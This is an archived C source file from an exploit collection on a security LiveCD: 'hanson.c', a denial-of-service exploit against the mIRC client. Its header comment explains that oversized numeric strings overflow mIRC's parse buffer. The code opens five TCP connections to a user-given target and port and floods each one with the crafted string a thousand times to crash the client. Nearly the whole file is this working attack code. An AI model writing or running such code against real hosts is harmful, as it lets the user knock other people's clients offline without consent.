home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / irc / mirc / mirc-hanson.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  3KB  |  95 lines

  1. /*
  2.        hanson.c - by myn with help from h2o and watcher *thanks*
  3.  
  4.     This lil program exploits mIRC's bound sockets, making the client crash
  5.  
  6.     mIRC can handle a mass influx of data but cannot handle strings of data
  7.     that are parsed internally through mIRC. This program forces mIRC to
  8.     parse incoming data and identify it, the result from the parse
  9.     is larger then mIRC's buffer string size, thus making the
  10.     client crash :).  This will create 5 connections to the bound port and
  11.     then send the string.
  12.  
  13.     Its like sending double "int" when you only had 1 bit to work with!
  14.  
  15.     hanson.c is dedicated to all the lil 13 to 16 year old geeks (abyss)
  16.     that are in love with those cute boys..
  17.  
  18.           myn@efnet
  19. */
  20.  
  21. #include <stdio.h>
  22. #include <string.h>
  23. #include <netdb.h>
  24. #include <netinet/in.h>
  25. #include <sys/types.h>
  26. #include <sys/socket.h>
  27. #include <unistd.h>
  28.  
  29. int x, s, i, p, dport;
  30.  
  31. /* SET STRING HERE */
  32. char *str = "999999999999999999999999999999999999999999999"
  33.  "99999999999999999999999999999999999999999999999999999999"
  34.  "9999999999999999999999999999999999999999999*999999999999"
  35.  "99999999999999999999999999999999999999999999999999999999"
  36.  "9999999999999999999999999999999999999999999999999999999";
  37.  
  38. struct sockaddr_in addr, spoofedaddr;
  39. struct hostent *host;
  40.  
  41. int open_sock(int sock, char *server, int port) {
  42.   struct sockaddr_in blah;
  43.   struct hostent *he;
  44.   bzero((char *)&blah,sizeof(blah));
  45.   blah.sin_family=AF_INET;
  46.   blah.sin_addr.s_addr=inet_addr(server);
  47.   blah.sin_port=htons(port);
  48.  
  49.   if ((he = gethostbyname(server)) != NULL) {
  50.     bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
  51.   }
  52.   else {
  53.     if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
  54.       perror("gethostbyname()");
  55.       return(-3);
  56.     }
  57.   }
  58.  
  59.   if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
  60.     perror("connect()");
  61.     close(sock);
  62.     return(-4);
  63.   }
  64.   printf("     Connected to [%s:%d].\n",server,port);
  65.   return;
  66. }
  67.  
  68. void main(int argc, char *argv[]) {
  69.   int t;
  70.   if (argc != 3) {
  71.     printf("hanson.c - myn@efnet\n\n");
  72.     printf("This lil program exploits mIRC's bound sockets, making the client crash\n\n");
  73.     printf("Usage: %s <target> <port>\n",argv[0]);
  74.     exit(0);
  75.   }
  76.   printf("hanson.c - myn@efnet\n\n");
  77.   for (t=0; t<5; t++)
  78.   {
  79.     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
  80.       perror("socket()");
  81.       exit(-1);
  82.     }
  83.     p = atoi(argv[2]);
  84.     open_sock(s,argv[1],p);
  85.  
  86.     printf("     Sending string 1ooo times to %s port %i... \n", argv[1], p);
  87.  
  88.     for (i=0; i<1000; i++) {
  89.       send(s,str,strlen(str),0x0);
  90.     }
  91.     printf("mmmmb0p.\n");
  92.   }
  93.   close(s);
  94. }
  95. /*                    www.hack.co.za           [14 August 2000]*/